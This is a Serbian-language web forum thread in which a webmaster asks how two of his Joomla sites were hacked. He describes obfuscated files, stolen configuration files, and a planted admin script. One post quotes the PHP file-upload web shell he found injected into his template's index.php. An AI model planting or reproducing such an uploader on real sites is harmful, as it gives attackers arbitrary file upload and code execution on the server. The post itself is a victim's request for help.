Prijava na forum:
Ime:
Lozinka:
Prijavi me trajno:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:

ConQUIZtador
Trenutno vreme je: 13. Jul 2025, 10:46:18
nazadnapred
Korisnici koji su trenutno na forumu 0 članova i 0 gostiju pregledaju ovu temu.


Tema za pitanja
o SMF forumu, phpBB2 i phpBB3 forumu, Wordpress i Joomla CMS sistemima!

Za vecinu drugih pitanja nacicete odgovor citajuci Top teme!

Idi dole
Stranice:
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
Tema: Hakovan joomla sajt  (Pročitano 1452 puta)
13. Jun 2011, 20:33:02
Clan u razvoju


Zodijak
Pol Muškarac
Poruke 43
OS
Nepoznat
Browser
Chrome 12.0.742.91
mob
Samsung 
U toku zdnjih 3 dana dvaput mi je hakovan joomla sajt, dva razlicita.Steta nije velika samo je promenjen index.php file, ali mi nije jasno kako su to uradili.
Naime na serveru su ubacili php skriptu tipa webadmin.php i preko nje modifikovali index.php.Po datumu modifikacije video sam samo dva sajta.
Sada je to malo drugacije.
Skripta je eval("?>".base64_decode je kodirana i ima vise inficiranih fajlova TMP folder je pun nekih php fajlova , svi su kodirani i templates folder je modifikovan defult templates.
Da li bi neko znao kako su ubacili ove fajlove na hosting, posto neverujem da su mi probili sifru.Joomla je bila 15.22 nisam je updateovao da nije mozda preko nje?

Svaka informacija bi mi bila korisna kako ne bi ponovo doslo do slicnih situacija
IP sačuvana
social share
Pogledaj profil GTalk Skype
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Clan u razvoju


Zodijak
Pol Muškarac
Poruke 43
OS
Nepoznat
Browser
Chrome 12.0.742.91
mob
Samsung 
Sad sam primetio jos nesto zanimljivo ali totalno nejasno.
Medju fajlovima sa ovog drugog sajta koji su mi hakovali, nasao sam fajl pod imenom es.txt.

koji je ustvari configuration.php sa mog prvog hakovanog sajta, i se.txt koji je sa necijeg tudjeg a ne mog sajta , tako da sad posedujem parametre od tog sajta kod mene na serveru.
mislim ludilo.
valjda neko zna foru na koju rade
IP sačuvana
social share
Pogledaj profil GTalk Skype
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Clan u razvoju


Zodijak
Pol Muškarac
Poruke 43
OS
Nepoznat
Browser
Chrome 12.0.742.91
mob
Samsung 
Samo da dodam , fajlove koje sam malopre pomenuo vidim preko njihove webadmin skripte, a preko mog fajl menadzera ne i preko filezile sam probao ali ih nevidim.
B   0 / ?--------- / root
velicini fajla prikazuje kao B a ovaj upitnik je chmod
IP sačuvana
social share
Pogledaj profil GTalk Skype
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Moderator
Capo di tutti capi


Underpromise; overdeliver.

Zodijak Gemini
Pol Muškarac
Poruke Odustao od brojanja
Zastava 44°49′N - 20°29′E
OS
Windows Vista
Browser
Opera 9.80
mob
Apple iPhone 6s
Ili je joomla ili neki plugin busan.. ili postoji problem na nivou celog hosta Wink
IP sačuvana
social share
Pobednik, pre svega.

Napomena: Moje privatne poruke, icq, msn, yim, google talk i mail ne sluze za pruzanje tehnicke podrske ili odgovaranje na pitanja korisnika. Za sva pitanja postoji adekvatan deo foruma. Pronadjite ga! Takve privatne poruke cu jednostavno ignorisati!
Preporuke za clanove: Procitajte najcesce postavljana pitanja!
Pogledaj profil WWW GTalk Twitter Facebook
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Clan u razvoju


Zodijak
Pol Muškarac
Poruke 43
OS
Nepoznat
Browser
Chrome 12.0.742.91
mob
Samsung 
Moram da postujem i ovo
Ovo sam naso u defult joomla template, izmenjen je index.php
ovo je kod

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post"

enctype="multipart/form-data" name="uploader"

id="uploader">';
echo '<input type="file" name="file" size="50"><input

name="_upl" type="submit" id="_upl"

value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
   if(@copy($_FILES['file']['tmp_name'],

$_FILES['file']['name'])) { echo '<b>usta upload basarili

</b><br><br>'; }
   else { echo '<b>usta upload basarili

olmadi.Baska siteye dal!!</b><br><br>'; }
}
?>
IP sačuvana
social share
Pogledaj profil GTalk Skype
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Ucesnik diskusija


Zodijak
Pol Muškarac
Poruke 166
OS
Nepoznat
Browser
Mozilla Firefox 4.0.1
mob
Samsung D510
Koliko se secam, Joomla! sama ne moze da menja index.php. Ako sam u tome u pravu, verovatno ti je provaljen FTP nalog. Koji je hosting u pitanju?
IP sačuvana
social share
Pogledaj profil
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Idi gore
Stranice:
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
Trenutno vreme je: 13. Jul 2025, 10:46:18
nazadnapred
Prebaci se na:  

Poslednji odgovor u temi napisan je pre više od 6 meseci.  

Temu ne bi trebalo "iskopavati" osim u slučaju da imate nešto važno da dodate. Ako ipak želite napisati komentar, kliknite na dugme "Odgovori" u meniju iznad ove poruke. Postoje teme kod kojih su odgovori dobrodošli bez obzira na to koliko je vremena od prošlog prošlo. Npr. teme o određenom piscu, knjizi, muzičaru, glumcu i sl. Nemojte da vas ovaj spisak ograničava, ali nemojte ni pisati na teme koje su završena priča.

web design

Forum Info: Banneri Foruma :: Burek Toolbar :: Burek Prodavnica :: Burek Quiz :: Najcesca pitanja :: Tim Foruma :: Prijava zloupotrebe

Izvori vesti: Blic :: Wikipedia :: Mondo :: Press :: Naša mreža :: Sportska Centrala :: Glas Javnosti :: Kurir :: Mikro :: B92 Sport :: RTS :: Danas

Prijatelji foruma: Triviador :: Nova godina Beograd :: nova godina restorani :: FTW.rs :: MojaPijaca :: Pojacalo :: 011info :: Burgos :: Sudski tumač Novi Beograd

Pravne Informacije: Pravilnik Foruma :: Politika privatnosti :: Uslovi koriscenja :: O nama :: Marketing :: Kontakt :: Sitemap

All content on this website is property of "Burek.com" and, as such, they may not be used on other websites without written permission.

Copyright © 2002- "Burek.com", all rights reserved. Performance: 0.091 sec za 16 q. Powered by: SMF. © 2005, Simple Machines LLC.